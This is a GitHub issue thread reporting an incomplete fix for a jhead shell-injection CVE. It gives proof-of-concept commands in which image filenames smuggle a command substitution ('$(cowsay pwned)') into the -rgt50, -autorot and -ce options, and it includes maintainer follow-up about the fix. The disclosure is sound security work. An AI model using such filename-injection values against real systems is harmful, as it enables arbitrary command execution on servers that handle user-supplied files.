jhead icon indicating copy to clipboard operation
jhead copied to clipboard
verified publisher icon Matthias-Wandel

Incomplete fix for CVE-2022-41751

Open jwilk opened this issue 3 years ago • 1 comments

Cc: @kyle-tenet3

#57 did not fix the shell injection.

Proof of concept:

$ cp tests/expected-bin/thumb-inserted.jpg 'moo$(cowsay pwned).jpeg'
$ jhead -rgt50 moo*.jpeg
mogrify-im6.q16: unable to open image `moo _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||.jpeg': No such file or directory @ error/blob.c/OpenBlob/2874.

Error : Unable to run 'mogrify' command
in file 'moo$(cowsay pwned).jpeg'

jwilk avatar Oct 19 '22 08:10 jwilk

The -autorot option is vulnerable too:

$ rm -f moo*.jpeg
$ cp tests/normal-digicams/rotate.jpg 'moo$(cowsay pwned).jpeg' 
$ jhead -autorot moo*.jpeg
jpegtran: can't open moo _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||.jpeg.thi for reading
Modified: moo$(cowsay pwned).jpeg

So is the -ce option:

$ rm -f moo*.jpeg
$ cp tests/normal-digicams/rotate.jpg 'moo$(cowsay pwned >&2 | sleep 99).jpeg'
$ jhead -ce moo*.jpeg
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

jwilk avatar Oct 19 '22 09:10 jwilk

Fixed by ec67262b8e5a4b05d8ad6898a09f1dc3fc032062

Matthias-Wandel avatar Oct 22 '22 12:10 Matthias-Wandel

It would be great to tag a new release.

ffontaine avatar Nov 12 '22 21:11 ffontaine

I prefer to do that after I find time to look at the open issues

On Sat, Nov 12, 2022 at 5:43 PM Fabrice Fontaine @.***> wrote:

It would be great to tag a new release.

— Reply to this email directly, view it on GitHub https://github.com/Matthias-Wandel/jhead/issues/60#issuecomment-1312578836, or unsubscribe https://github.com/notifications/unsubscribe-auth/AOSCO3H3TOL67NHB4ISBYN3WIAFR3ANCNFSM6AAAAAARI36XW4 . You are receiving this because you commented.Message ID: @.***>

Matthias-Wandel avatar Nov 12 '22 21:11 Matthias-Wandel

Tried reproducing your "vulnerabilities". The output I get is: Nonfatal Error : 'moo$(cowsay pwned).jpeg' Filename has invalid characters.

No attempt at trying to execute some file. Plus, this so called vulnerability is only if you give it parameters on the command line to execute that file, I think. Doesn't really matter, because as far as I can tell, this doesn't work, at least your demonstration doesn't work.

Matthias-Wandel avatar Jun 06 '23 13:06 Matthias-Wandel

Tried reproducing your "vulnerabilities".

@Matthias-Wandel, I believe the vulnerability was only reproducible until you patched it in October.

These types of command line vulnerabilities are serious, since servers using jhead might read filenames which are controlled by a user/attacker.

eslerm avatar Jun 06 '23 20:06 eslerm